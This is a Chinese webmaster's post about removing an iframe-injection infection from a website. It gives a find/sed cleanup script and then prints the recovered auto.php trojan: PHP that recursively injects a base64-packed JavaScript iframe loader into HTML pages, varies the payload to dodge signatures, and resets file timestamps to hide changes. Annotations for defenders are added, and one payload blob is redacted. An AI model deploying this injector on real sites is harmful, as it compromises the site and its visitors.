用shell命令删除网站最新nb挂马的方法与代码
确实很让人头痛,还是编写shell 脚本把这些脚本去掉</p><p class="codetitle"><span style="text-decoration:underline;">复制代码</span> 代码如下:</p><p class="codebody"><br/>
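#!/bin/sh
# Strip the injected lines from every static page under the web root given
# as $1. The two sed patterns are the markers the injector leaves behind: the
# cookie check and the packed "eval(function(p,a,c,k,e,d)" loader.
#
# Usage: ./clean.sh /path/to/webroot
#
# This only removes the injected lines; it does not remove the PHP file that
# re-injects them (the auto.php described further down), so the pages come
# back until that file is found and deleted too. Keep a copy of the web root
# before running it if the injected lines are wanted for analysis.
#
# Compared with the first version of this script:
# - sub-directories are walked as well, because the injector recurses, and
#   .html/.shtml are covered along with .htm, which is the set the injector
#   itself matches
# - find -exec replaces parsing the output of ls, so paths with spaces or
#   other odd characters are handled
# - a missing or non-directory argument stops the script instead of
#   expanding to "/*.htm"

if [ -z "$1" ] || [ ! -d "$1" ]; then
    echo "usage: $0 <webroot directory>" >&2
    exit 1
fi

find "$1" -type f \( -name '*.htm' -o -name '*.html' -o -name '*.shtml' \) \
    -exec sed -i -e "/if(document.cookie.indexOf('helio'/d; /eval(function(p,a,c,k,e,d)/d;" {} +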
但是第二天还是有<br/><br/>
最后偶然发现 网站中有个auto.php 文件比较可疑<br/>
查看下内容,果然是木马的根源<br/>
下面是其内容,希望对大家有所帮助</p><p class="codetitle"><span style="text-decoration:underline;">复制代码</span> 代码如下:</p><p class="codebody"><br/><?php<br/>
// Only fatal errors are reported and the execution time limit is lifted, so
// the recursive directory walk below runs to completion without leaving
// warnings or notices in the server's error log.
error_reporting(E_ERROR);
set_time_limit(0);
/**
 * Normalise a filesystem path: every backslash becomes a forward slash and a
 * doubled slash collapses to one. Both replacements are single-pass, so a
 * run of three slashes still leaves two behind.
 *
 * @param string $path path as assembled by the caller
 * @return string the normalised path
 */
function CheckPath($path)
{
    $forwardSlashes = strtr($path, ['\\' => '/']);
    return strtr($forwardSlashes, ['//' => '/']);
}
/**
 * Read a whole file into a string in binary mode. Every call is wrapped in
 * "@", so a missing or unreadable file comes back as false (from fread on a
 * false handle) without a warning in the server log.
 *
 * Note: an empty file gives filesize() 0, which fread() rejects — on PHP 8
 * that is a ValueError, which "@" does not suppress.
 *
 * @param string $filename path to read
 * @return string|false file contents, or false when the read failed
 */
function AutoRead($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
/**
 * Write $filecode to $filename (surrounded by CRLF) and then put the file's
 * original modification time back with touch(), so the edit does not show
 * up in mtime-based triage such as `find -newer` or sorting by date.
 *
 * Defender note: touch() can restore mtime but cannot reset ctime, so
 * `find -cnewer <reference>` or `stat` still show when the file was really
 * changed. All calls are "@"-suppressed, so nothing is logged on failure.
 *
 * @param string $filename path to write
 * @param string $filecode content to write
 * @param string $filemode fopen() mode; the caller on this page passes "wb"
 * @return bool true when fwrite() reported a non-zero byte count
 */
function AutoWrite($filename, $filecode ,$filemode)
{
// Remembered before the write so it can be put back at the end.
$time = @filemtime($filename);
$handle = @fopen($filename,$filemode);
$key = @fwrite($handle,"\r\n".$filecode."\r\n");
if(!$key)
{
// Retry after making the file world-writable. The same handle is reused,
// so this can only help when fopen() succeeded and the write itself failed;
// if fopen() returned false the second fwrite() fails just like the first.
@chmod($filename,0666);
$key = @fwrite($handle,"\r\n".$filecode."\r\n");
}
@fclose($handle);
// Timestamp put back to what it was before the write.
@touch($filename,$time);
return $key ? true : false;
}
/**
 * Build a string of $length pseudo-random upper-case ASCII letters.
 * Uses rand(), so the result is not suitable for anything secret; the
 * callers on this page only use it to vary the text they assemble.
 *
 * @param int $length number of characters wanted; 0 or less gives ""
 * @return string the generated letters
 */
function make_pass($length)
{
    $alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $alphabetSize = strlen($alphabet);
    $out = "";
    for ($i = 0; $i < $length; $i++) {
        $out .= $alphabet[rand() % $alphabetSize];
    }
    return $out;
}
/**
 * Walk $dir recursively and, for every .htm/.shtml page that does not already
 * carry the packed loader, splice the assembled script into it (see the notes
 * on the empty needle below). Progress is echoed as "ok:" / "err:" lines.
 *
 * As listed here the function never gets that far: the die() after the
 * payload is assembled ends the request on the first non-skipped directory
 * entry, so everything from CheckPath() down is unreachable. Whether the
 * poster added that line to defuse the script or it was already there
 * cannot be told from the page.
 *
 * @param string $dir directory to start from; comes straight from $_GET['dir']
 * @return bool always true
 */
function AutoRun($dir)
{
$spider = @opendir($dir);
while($file = @readdir($spider))
{
// Skip list by entry name at any depth. The names (templets, member,
// special, uploads, include, data, install) look like a DedeCMS directory
// layout — presumably the target application; confirm against the site.
if($file == '.' || $file == '..' || $file == 'a' || $file == 'images' || $file == 'uploads' || $file == 'special' || $file == 'data' || $file == 'include' || $file == 'member' || $file == 'templets' || $file == 'install') continue;
// The payload is rebuilt for every entry. The first blob is redacted on this
// page; the two make_pass(3) tokens put three random letters on each side of
// a "|", so the injected text differs from page to page (most likely to
// defeat exact-match signatures — the markers the cleanup script greps for
// are in the fixed parts).
$code = base64_decode('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');
$code .= make_pass(3);
$code .= '|';
$code .= make_pass(3);
// Decodes to the tail of a packed script: a word list ("|cn|document|gov|
// height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|
// ubb|width|writeln|www|xcrsrc"), the closing ".split('|'),0,{}));}", then
// "\r\n</script>\r\n</head>". The words document/writeln/iframe/src/width/
// height suggest an iframe written into the page; the packed body itself is
// in the redacted blob.
$code .= base64_decode('fGNufGRvY3VtZW50fGdvdnxoZWlnaHR8aHR0cHxpZnJhbWV8aW1hZ2VzfGphdmFzY3JpcHR8anBnfGpzfGtpc3N8bGFuZ3VhZ2V8bWlzc3xzY3JpcHR8c3JjfHViYnx3aWR0aHx3cml0ZWxufHd3d3x4Y3JzcmMnLnNwbGl0KCd8JyksMCx7fSkpO30NCjwvc2NyaXB0Pg0KPC9oZWFkPg==');
// Prints the assembled payload and stops the request; nothing below runs.
die($code);
$filename = CheckPath($dir.'/'.$file);
if(is_dir($filename)) AutoRun($filename);
// eregi() was removed in PHP 7. The pattern is an unanchored substring
// match, so .html is matched as well as .htm and .shtml.
if(eregi('\.htm|\.shtml',$file))
{
$checkcode = AutoRead($filename);
// Skip pages that already contain the packer signature. The empty needle
// in the second stristr() (and in str_replace() below) is almost certainly
// an HTML tag lost when this page was extracted; since the payload ends in
// "</script></head>", "</head>" is the probable original marker.
if((!stristr($checkcode,'eval(function(')) && stristr($checkcode,''))
{
$newcode = str_replace('',$code,$checkcode);
// One status line per page, flushed so the HTTP client sees progress live.
echo AutoWrite($filename, $newcode, "wb") ? "ok:".$filename."<br/>\n" : "err:".$filename."<br/>\n";
ob_flush();
flush();
}
}
$checkcode = NULL;
$newcode = NULL;
}
@closedir($spider);
return true;
}
// Entry point. A request carrying ?dir=<path> starts the walk from that path;
// $_GET['dir'] reaches AutoRun() unchecked, so any client that can reach this
// URL can point it at any directory the web server user can read. With no
// parameter the script only prints its own URL with ?dir= pre-filled to the
// directory the file sits in — a ready-made link to start from the web root.
// Detection: requests with "?dir=" against unfamiliar .php files in the
// access log; the file itself (auto.php in the post) is what has to go.
if(isset($_GET['dir']))
{
AutoRun($_GET['dir']);
}
echo 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'].'?dir='.CheckPath(dirname(__FILE__));
?></p>